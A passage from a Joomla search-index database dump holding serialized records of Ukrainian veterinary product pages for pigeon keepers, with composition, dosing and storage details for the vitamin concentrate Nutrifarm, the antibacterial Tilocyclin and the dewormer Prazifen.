в кормах міститься надлишок селену. Застереження: Не додавати у гарячий корм. Форма випуску: Пластикові пакети по 1, 3, 5, 10 г та 1000 г. Зберiгання: В сухому недоступному для дітей місці при температурі не вище 25°С. Термін придатності: 12 місяців з дня виготовлення. Приготовлений розчин придатний протягом доби. Виробник: ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул. Дворецька, 89 ','2020-09-02 10:04:17','74e6fe57c93d9b25a8a84c8e6fc2a3a6',1,1,1,'*','2020-09-02 06:56:35','0000-00-00 00:00:00','2020-09-02 06:56:35','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2459\";s:5:\"alias\";s:29:\"vitaminnij-kompleks-nutrifarm\";s:7:\"summary\";s:6372:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/nutrifarm1.jpg\"><img alt=\"\" class=\"fr-fir fr-dii\" src=\"https://malehus.in.ua/images/stories/nutrifarm1.jpg\"></a></p><p>Опис:<br>  Однорідний сипучий порошок від жовтого до світло-коричневого  кольору із специфічним запахом, що розчиняється у воді.<br>  <br>  Склад:<br>  1 кг порошка містить:<br>  вітамін А (ретинол) —10 000 000 Од;<br>  вітамін Д3 (холекальциферол) — 700 000 Од;<br>  вітамін Е (токоферол ацетат) - 5500 мг;<br>  вітамін К3 (менадіон) - 1750 мг;<br>  вітамін С (аскорбінова кислота) — 20 000 мг;<br>  вітамін В1 (тіамін) — 1250 мг;<br>  вітамін В2 (рибофлавін) — 2500 мг;<br>  вітамін В3 (нікотинова кислота) — 18 000 мг;<br>  вітамін В5 (пантотенова кислота) — 6000 мг;<br>  вітамін В6 (піридоксин) — 2000 мг;<br>  вітамін В9 (фолієва кислота) 400 мг;<br>  вітамін В12 (ціанокобаламін) — 7,5 мг;<br>  лізин — 4000 мг;<br>  метіонін — 4000 мг;<br>  триптофан —600 мг;<br>  селен — 33 мг.<br>  лактозу.<br>  <br>  Фармакологiчнi властивостi:<br>  Властивості водорозчинного вітамінно-амінокислотного  концентрату зумовлені наявністю вітамінів, амінокислот та селену, які входять  до його складу. Вітаміни відіграють роль каталізаторів в організмі тварин.  Незамінні амінокислоти необхідні для синтезу білка. Селен бере участь в  метаболізмі тиреоїдних гормонів, гормонів щитовидної залози, які необхідні для  росту і диференціації всіх клітин в організмі (фактор розвитку), підвищує  резистентність організму до несприятливих факторів навколишнього середовища та  попереджує пошкодження клітин, зумовлене процесом окислення. Концентрат  активізує окисно-відновні реакції, процеси кровотворення, підвищує  засвоюваність кормів, яйценоскість, нормалізує обмін речовин, забезпечує  високий темп розвитку молодняка та покращення стану його здоров\'я, знижує  падіж, підтримує продуктивність сількогосподарських тварин і птиці на високому  рівні при стресових ситуаціях.<br>  <br>  Застосування:<br>  Нутріфарм застосовують для профілактики та лікування  гіповітамінозів, зниження впливу на організм тварин і птиці стрес-факторів  різного походження, при порушеннях метаболізму в печінці, при захворюваннях,  спричинених недостатністю селену і амінокислот в кормах, для стимуляції імунної  системи під час вакцинації, підвищення продуктивності і ефективності  використання кормів, підвищення статевої активності самців та збільшення  тривалості використання маточного поголів\'я.<br>  <br>  Дозування:<br>  Перорально з питною водою або у суміші з кормом у дозах:<br>  домашній птиці розчин задають груповим способом, для чого розчиняють  концентрат у питній воді у співвідношенні 1 г на 2 л питної води і випоюють  розчин протягом доби, що достатньо для 12 курей, 20 бройлерів або гусей, 20-25  курчат, 5 індиків;<br>  поросятам (віком 2-4 місяці) 0,4-0,8 г на голову;<br>  ягнятам і козлятам 0,5-0,8 г на голову;<br>  телятам і лошатам 2-3 г на голову;<br>  хрякам 5-10 г на голову.<br>  Концентрат в зазначених дозах розчиняють у воді чи у суміші з  кормом та задають тварині протягом доби.<br>  Розчин готують кожного дня, суміш з кормом можна підготувати  заздалегідь та використовують з профілактичною метою протягом 3-7 днів; з  лікувальною протягом 5-10 днів.<br>  <br>  Протипоказання:<br>  Не використовувати в місцевостях, де в кормах міститься  надлишок селену.<br>  <br>  Застереження:<br>  Не додавати у гарячий корм.<br>  <br>  Форма випуску:<br>  Пластикові пакети по 1, 3, 5, 10 г та 1000 г.<br>  <br>  Зберiгання:<br>  В сухому недоступному для дітей місці при температурі не вище  25°С.<br>  <br>  Термін придатності:<br>  12 місяців з дня виготовлення.<br>  Приготовлений розчин придатний протягом доби.<br>  <br>  Виробник:<br>  ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул.  Дворецька, 89  </p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"135\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-02 07:04:17\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"6\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:45:\"Інформація голубівникам\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:34:\"2459:vitaminnij-kompleks-nutrifarm\";s:7:\"catslug\";s:29:\"135:informatsiia-holubivnykam\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:78:\"/index.php/holuby/informatsiia-holubivnykam/2459-vitaminnij-kompleks-nutrifarm\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:45:\"Інформація голубівникам\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:45:\"Інформація голубівникам\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2459\";s:5:\"route\";s:89:\"index.php?option=com_content&view=article&id=2459:vitaminnij-kompleks-nutrifarm&catid=135\";s:5:\"title\";s:56:\"Вітамінний комплекс НУТРІФАРМ\";s:11:\"description\";s:5866:\" Опис: Однорідний сипучий порошок від жовтого до світло-коричневого кольору із специфічним запахом, що розчиняється у воді. Склад: 1 кг порошка містить: вітамін А (ретинол) —10 000 000 Од; вітамін Д3 (холекальциферол) — 700 000 Од; вітамін Е (токоферол ацетат) - 5500 мг; вітамін К3 (менадіон) - 1750 мг; вітамін С (аскорбінова кислота) — 20 000 мг; вітамін В1 (тіамін) — 1250 мг; вітамін В2 (рибофлавін) — 2500 мг; вітамін В3 (нікотинова кислота) — 18 000 мг; вітамін В5 (пантотенова кислота) — 6000 мг; вітамін В6 (піридоксин) — 2000 мг; вітамін В9 (фолієва кислота) 400 мг; вітамін В12 (ціанокобаламін) — 7,5 мг; лізин — 4000 мг; метіонін — 4000 мг; триптофан —600 мг; селен — 33 мг. лактозу. Фармакологiчнi властивостi: Властивості водорозчинного вітамінно-амінокислотного концентрату зумовлені наявністю вітамінів, амінокислот та селену, які входять до його складу. Вітаміни відіграють роль каталізаторів в організмі тварин. Незамінні амінокислоти необхідні для синтезу білка. Селен бере участь в метаболізмі тиреоїдних гормонів, гормонів щитовидної залози, які необхідні для росту і диференціації всіх клітин в організмі (факторрозвитку), підвищує резистентність організму до несприятливих факторів навколишнього середовища та попереджує пошкодження клітин, зумовлене процесом окислення. Концентрат активізує окисно-відновні реакції, процеси кровотворення, підвищує засвоюваність кормів, яйценоскість, нормалізує обмін речовин, забезпечує високий темп розвитку молодняка та покращення стану його здоров\'я, знижує падіж, підтримує продуктивність сількогосподарських тварин і птиці на високому рівні при стресових ситуаціях. Застосування: Нутріфарм застосовують для профілактики та лікування гіповітамінозів, зниження впливу на організм тварин і птиці стрес-факторів різного походження, при порушеннях метаболізму в печінці, при захворюваннях, спричинених недостатністю селену і амінокислот в кормах, для стимуляції імунної системи під час вакцинації, підвищення продуктивності і ефективності використання кормів, підвищення статевої активності самців та збільшення тривалості використання маточного поголів\'я. Дозування: Перорально з питною водою або у суміші з кормом у дозах: домашній птиці розчин задаютьгруповим способом, для чого розчиняють концентрат у питній воді у співвідношенні 1 г на 2 л питної води і випоюють розчин протягом доби, що достатньо для 12 курей, 20 бройлерів або гусей, 20-25 курчат, 5 індиків; поросятам (віком 2-4 місяці) 0,4-0,8 г на голову; ягнятам і козлятам 0,5-0,8 г на голову; телятам і лошатам 2-3 г на голову; хрякам 5-10 г на голову. Концентрат в зазначених дозах розчиняють у воді чи у суміші з кормом та задають тварині протягом доби. Розчин готують кожного дня, суміш з кормом можна підготувати заздалегідь та використовують з профілактичною метою протягом 3-7 днів; з лікувальною протягом 5-10 днів. Протипоказання: Не використовувати в місцевостях, де в кормах міститься надлишок селену. Застереження: Не додавати у гарячий корм. Форма випуску: Пластикові пакети по 1, 3, 5, 10 г та 1000 г. Зберiгання: В сухому недоступному для дітей місці при температурі не вище 25°С. Термін придатності: 12 місяців з дня виготовлення. Приготовлений розчин придатний протягом доби. Виробник: ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул. Дворецька, 89 \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-02 06:56:35\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-02 06:56:35\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4616,'index.php?option=com_content&view=article&id=2460','index.php?option=com_content&view=article&id=2460:tilotsiklin-antibakterialnij-preparat-dlya-sistemnogo-zastosuvannya&catid=135','Тілоциклін - антибактеріальний препарат для системного застосування',' Порошок світло-жовтого кольору розчинний у воді. Склад Препарат містить тилозин тартрат, доксициклін та метронідазол. Застосування Для лікування і профілактики в голубів і декоративних птахів при захворюваннях дихальних шляхів, орнітозу (Chlamydophila psittaci); мікоплазмоза (Mycoplasma columborale); кишкової палички (Esherichia coli); Pelistega europea; Staphylococus intermedius; трихомонозу (Trichomonas gallinae). Симптоми: чхання, задишка, утруднене дихання, виділення з носа, сльозоточивість, набряк повік, дихання з відкритим дзьобом, збільшена кількість слини в роті, нальоти на горлі, гортані, трахеї. Дозування - для лікування 2,5 г/1 л води (40 голубів) протягом 5-7 днів. При гострій формі і орнітозі 5 г/1 л води протягом 8-16 днів; - для профілактики: щомісячно 2,5 г/1 л води протягом 3 днів; - для досягнення гарної фізичної форми: 2,5 г/1л води протягом 5 днів на початку гоночного сезону; - для підтримки спортивної форми: 2,5 г/1л води протягом 2 днів після навантаження (гонки або тренування). Застереження Не використовувати для птахів, призначених для вживання в їжу. Форма випуску Фольговані пакети по 10, 200 г Зберігання Сухе місце за температуривід 5° до 25 °С. Виробник ПП фірма \"Фарматон\", вул. Дворецька, 89, м. Рівне, Україна, 33001 ','2020-09-02 10:09:11','34eec42f809d507d1259c7a1ae233708',1,1,1,'*','2020-09-02 07:09:01','0000-00-00 00:00:00','2020-09-02 07:09:01','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2460\";s:5:\"alias\";s:67:\"tilotsiklin-antibakterialnij-preparat-dlya-sistemnogo-zastosuvannya\";s:7:\"summary\";s:2455:\"	<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/tilociklin.jpg\"><img src=\"https://malehus.in.ua/images/stories/tilociklin.jpg\" alt=\"\" class=\"fr-fir fr-dii\"></a></p><p>Порошок світло-жовтого кольору розчинний  у воді.<br>  <br>  Склад<br>  Препарат містить тилозин тартрат, доксициклін та метронідазол.<br>  <br>  Застосування<br>  Для лікування і профілактики в голубів і декоративних птахів при захворюваннях  дихальних шляхів, орнітозу (Chlamydophila psittaci); мікоплазмоза (Mycoplasma columborale); кишкової палички (Esherichia coli); Pelistega europea; Staphylococus intermedius; трихомонозу (Trichomonas gallinae).<br>  Симптоми: чхання, задишка, утруднене дихання, виділення з носа,  сльозоточивість, набряк повік, дихання з відкритим дзьобом, збільшена кількість  слини в роті, нальоти на горлі, гортані, трахеї.<br>  <br>  Дозування<br>  - для лікування 2,5 г/1 л води (40 голубів) протягом 5-7 днів. При гострій  формі і орнітозі 5 г/1 л води протягом 8-16 днів;<br>  - для профілактики: щомісячно 2,5 г/1 л води протягом 3 днів;<br>  - для досягнення гарної фізичної форми: 2,5 г/1л води протягом 5 днів на  початку гоночного сезону;<br>  - для підтримки спортивної форми: 2,5 г/1л води протягом 2 днів після  навантаження (гонки або тренування).<br>  <br>  Застереження<br>  Не використовувати для птахів, призначених для вживання в їжу.<br>  <br>  Форма випуску<br>  Фольговані пакети по 10, 200 г<br>  <br>  Зберігання<br>  Сухе місце за температури від 5° до 25 °С.<br>  <br>  Виробник<br>  ПП фірма \"Фарматон\", вул. Дворецька, 89, м. Рівне, Україна, 33001</p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"135\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-02 07:09:11\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:45:\"Інформація голубівникам\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:72:\"2460:tilotsiklin-antibakterialnij-preparat-dlya-sistemnogo-zastosuvannya\";s:7:\"catslug\";s:29:\"135:informatsiia-holubivnykam\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:116:\"/index.php/holuby/informatsiia-holubivnykam/2460-tilotsiklin-antibakterialnij-preparat-dlya-sistemnogo-zastosuvannya\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:45:\"Інформація голубівникам\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:45:\"Інформація голубівникам\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2460\";s:5:\"route\";s:127:\"index.php?option=com_content&view=article&id=2460:tilotsiklin-antibakterialnij-preparat-dlya-sistemnogo-zastosuvannya&catid=135\";s:5:\"title\";s:127:\"Тілоциклін - антибактеріальний препарат для системного застосування\";s:11:\"description\";s:2130:\" Порошок світло-жовтого кольору розчинний у воді. Склад Препарат містить тилозин тартрат, доксициклін та метронідазол. Застосування Для лікування і профілактики в голубів і декоративних птахів при захворюваннях дихальних шляхів, орнітозу (Chlamydophila psittaci); мікоплазмоза (Mycoplasma columborale); кишкової палички (Esherichia coli); Pelistega europea; Staphylococus intermedius; трихомонозу (Trichomonas gallinae). Симптоми: чхання, задишка, утруднене дихання, виділення з носа, сльозоточивість, набряк повік, дихання з відкритим дзьобом, збільшена кількість слини в роті, нальоти на горлі, гортані, трахеї. Дозування - для лікування 2,5 г/1 л води (40 голубів) протягом 5-7 днів. При гострій формі і орнітозі 5 г/1 л води протягом 8-16 днів; - для профілактики: щомісячно 2,5 г/1 л води протягом 3 днів; - для досягнення гарної фізичної форми: 2,5 г/1л води протягом 5 днів на початку гоночного сезону; - для підтримки спортивної форми: 2,5 г/1л води протягом 2 днів після навантаження (гонки або тренування). Застереження Не використовувати для птахів, призначених для вживання в їжу. Форма випуску Фольговані пакети по 10, 200 г Зберігання Сухе місце за температуривід 5° до 25 °С. Виробник ПП фірма \"Фарматон\", вул. Дворецька, 89, м. Рівне, Україна, 33001 \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-02 07:09:01\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-02 07:09:01\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4617,'index.php?option=com_content&view=article&id=2461','index.php?option=com_content&view=article&id=2461:prazifen-glistoginnij-preparat&catid=135','Празіфен - глистогінний препарат',' 1 таблетка містить 1,43 мг празиквантелу, 11,43 мг фенбендазолу. Фармакологічні властивості: Празіфен - антигельмінтний препарат, дія якого зумовлена вмістом празіквантелу та фенбендазолу відносно нематод та цестод у голубів. Сумiсна дiя празіквантелу і фенбендазолу розширює дiапазон антигельмінтної дii препарату, не вимагає збiльшення дози при змiшаних гельмiнтозах i робить дегельмiнтизацiю більш ефективною, Застосування: Препарат застосовують для лікування і профілактики цестодозов, нематодозов у голубів. Дозування: Препарат застосовують перорально індивідуально по 1 таблетці кожному голубу вагою до 250 г одноразово. При сильній інвазії лікування повторюють через 4-6 тижнів. З метою профілактики рекомендується обробку повторювати кожні 4 місяці. Застереження: Не застосовувати виснаженої птиці, а також з піперазином, холінергічних препаратами (фосфорорганічні інсектициди, антгельмінтіки) або відразу після їх застосування. Форма випуску: Пакети із фольги по 50 таблеток. Зберігання: Сухе темне, недоступне для дітей місце за температури від 5° до 25°С. Термін придатності: 2роки. Для застосування у ветеринарній медицині: Виробник: ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул. Дворецька, 89. ','2020-09-02 10:13:22','dab71042bb41c15936a1a597a0b98a9b',1,1,1,'*','2020-09-02 07:13:22','0000-00-00 00:00:00','2020-09-02 07:13:22','0000-00-00 00:00:00',0,0,4,_binary 